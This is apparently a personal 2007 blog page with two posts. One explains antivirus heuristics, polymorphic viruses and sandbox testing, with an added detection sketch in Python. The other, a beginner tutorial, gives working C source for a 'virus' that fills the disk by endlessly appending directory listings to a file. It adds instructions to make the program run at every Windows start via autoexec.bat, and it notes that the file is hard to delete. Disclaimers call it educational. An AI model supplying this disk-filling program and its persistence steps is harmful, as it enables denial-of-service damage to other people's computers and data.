Bharat Banate's Work Profile


Friday, September 7, 2007

Antivirus: Working of an antivirus package (part II)

Continued... (from part I)

Now, suppose that a previously unknown strain of the Melissa virus happens to come into contact with your computer. Your antivirus software would use a technology known as heuristics to identify the virus.

Heuristics work on the basis of probability. The basic idea is that a variant of Melissa would still resemble one of the existing versions of Melissa. After all, if it looks like Melissa and it smells like Melissa, then it’s probably Melissa. If the heuristics algorithm causes the virus scanner to uncover a potential variant of a known virus, the scanner will alert you to the fact. When your antivirus software detects an unknown variant and alerts you to the potential virus, what it’s really telling you is that the file has a certain percentage of code in common with a known virus, or that the software has a certain level of confidence that the file contains viral code.

Polymorphic viruses
Heuristics are great if the virus remains true to its original form, but virus programmers are smart people. Some viruses are designed to encrypt themselves. Such viruses are known as polymorphic viruses. The idea behind polymorphic viruses is that they can reorganize themselves so as to have an extremely large potential number of signatures.

Fortunately, there’s a way to protect your machine from polymorphic viruses. If the virus scanner suspects a polymorphic virus, some antivirus software packages actually test the code. To do so, they create what’s known as a virtual machine. In a nutshell, a virtual machine is an area of memory that can behave as if it existed in a separate computer.

By opening a potentially hazardous file in a virtual machine, the antivirus software can test the file in a safe and controlled environment. If the file proves to be safe, the user will never know of the test. However, if the file does contain a virus, the user is alerted to the infection and prompted to take action.
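
The percentage-in-common idea, and the reason an encrypted copy has to be decoded in a controlled environment before it can be scored, can be sketched as follows. This is an added example, not code from any antivirus product: the function names, the 4-byte window, the 70% threshold and every byte string are assumptions constructed for illustration, and single-byte XOR stands in for a virus's self-encryption.

```python
# Added illustration: byte n-gram overlap as a stand-in for a scanner's
# heuristic score. All byte strings are constructed; none is real malware.

def ngrams(data: bytes, n: int = 4) -> set:
    """Set of every n-byte window in data."""
    return {data[i:i + n] for i in range(len(data) - n + 1)}

def overlap_percent(sample: bytes, known: bytes, n: int = 4) -> float:
    """Percentage of the known body's n-grams that also occur in sample."""
    ref = ngrams(known, n)
    if not ref:
        return 0.0
    return 100.0 * len(ref & ngrams(sample, n)) / len(ref)

def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice with the same key restores data."""
    return bytes(b ^ key for b in data)

# Constructed "known" body and the files scored against it.
KNOWN = b"open address book; pick first 50 entries; mail copy of document"
VARIANT = b"open address book; pick first 40 entries; mail copy of document!!"
UNRELATED = b"quarterly sales figures for the northern region, draft two"
ENCODED = xor_bytes(VARIANT, 0x5A)   # the same variant, stored encrypted

def verdict(sample: bytes, threshold: float = 70.0) -> str:
    """Human-readable result in the style of a scanner alert."""
    score = overlap_percent(sample, KNOWN)
    label = "ALERT" if score >= threshold else "clean"
    return f"{score:.0f}% in common -> {label}"

if __name__ == "__main__":
    cases = [("variant", VARIANT),
             ("unrelated", UNRELATED),
             ("encoded (static scan)", ENCODED),
             ("encoded (after decoding)", xor_bytes(ENCODED, 0x5A))]
    for name, blob in cases:
        print(f"{name:26s} {verdict(blob)}")
```

The static scan of the encoded copy shares nothing with the known body, while the decoded bytes score the same as the plain variant. Recovering those decoded bytes safely is what running the file inside the virtual machine achieves.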

Monday, September 3, 2007

VIRUS: Making a simple virus in C for beginners

Hi all,
At the beginning of learning computer programming, it is the dream of almost every student to build a computer virus of his or her own.
A computer virus is obviously something that should not be made and used on others' computers; it is completely illegal in all countries. So make and try this only on your own machine.
Now let me explain what viruses do. There are several types of computer viruses with different functions (destructive, obviously). Some delete a computer's important files and folders, some change the configuration of your computer system, such as registry values, and some occupy a large amount of memory space and dump your hard disk. There are also some viruses which can damage your RAM permanently.
I am going to give here a simple virus program which has only a few lines but has the ability to jam your hard disk.
The logic behind the program is nothing but making a self-growing file which grows to a few MB in one turn, and this growth continues infinitely.
The requirements to make this virus are:
OS: Windows 98/XP/2000, MS-DOS
Compiler: Borland C (which has a DOS shell)
Source code:
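//START v.c
#include <stdio.h>
#include <stdlib.h>   /* declares system() */

void main()
{
    /* Endless loop: each pass appends a directory listing to ╚a.exe */
    while(1)
    {
        system("dir>>╚a.exe");
    }
}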

As you can see, this is a very small program. Compiling it gives us the file v.exe. This is our virus.
How does it work? The system call "dir>>╚a.exe" executes the DOS command 'dir' and appends its output to a file named ╚a.exe (the symbol ╚ can be obtained by pressing 456 on the numpad while holding the Alt key). So running the program in a folder containing many files and folders will increase the size of ╚a.exe by a great amount. This process continues to infinity because it is inside a while(1) loop.
Best try this on Win98; then you cannot delete ╚a.exe from the GUI.
For auto-running, place v.exe in the command folder inside the Windows folder.
In the autoexec.bat (Win98) or autoexec.NT (WinXP/2000) file, simply write v.exe.
Each time Windows starts, v.exe will run automatically.
Try this on your own computer. Remember that ╚a.exe is the infected file which is growing in size continuously. So to recover, simply delete the v.exe and ╚a.exe files from your computer.


Caution:
This should not be used on others' computers. It is harmful. Before using it, you need to back up all the information saved on your system drive. After this program runs, it will jam your system drive, so you may need to reinstall your operating system. This information is given only for awareness/education purposes. PLEASE DO NOT USE THIS TO HARM ANYONE.
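
From the monitoring side, the self-growing file described in this post stands out because its size rises on every sample at a high, steady rate. The sketch below is an added example, not part of the original post: the snapshot data is constructed, and the function name, sampling interval and rate threshold are assumptions.

```python
# Added illustration: flag files whose size rises on every sample, as the
# dir-output file described above would. All snapshot data is constructed.
from collections import defaultdict

GROWER = "\u255aa.exe"   # the file name used in the post (╚a.exe)

# (seconds since start, file name, size in bytes), sampled every 10 seconds.
SNAPSHOTS = [
    (0, GROWER, 0),          (0, "report.doc", 52_000),  (0, "setup.log", 1_000),
    (10, GROWER, 2_000_000), (10, "report.doc", 52_000), (10, "setup.log", 1_200),
    (20, GROWER, 4_000_000), (20, "report.doc", 52_000), (20, "setup.log", 1_400),
    (30, GROWER, 6_000_000), (30, "report.doc", 52_000), (30, "setup.log", 1_600),
]

def growth_report(snapshots, free_bytes, min_rate=100_000, min_samples=3):
    """Return {name: (bytes_per_second, seconds_until_disk_full)} for files
    that grew in every interval and faster than min_rate bytes per second."""
    series = defaultdict(list)
    for t, name, size in sorted(snapshots):
        series[name].append((t, size))
    flagged = {}
    for name, points in series.items():
        if len(points) < min_samples:
            continue                      # too little history to judge
        elapsed = points[-1][0] - points[0][0]
        if elapsed <= 0:
            continue
        always_growing = all(later[1] > earlier[1]
                             for earlier, later in zip(points, points[1:]))
        rate = (points[-1][1] - points[0][1]) / elapsed
        if always_growing and rate >= min_rate:
            flagged[name] = (rate, free_bytes / rate)
    return flagged

if __name__ == "__main__":
    report = growth_report(SNAPSHOTS, free_bytes=1_000_000_000)
    for name, (rate, eta) in report.items():
        print(f"{name}: {rate:,.0f} B/s, disk full in about {eta / 60:.0f} min")
```

The slowly growing log and the unchanged document are not flagged; only the runaway file is, along with an estimate of how long the remaining free space will last.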

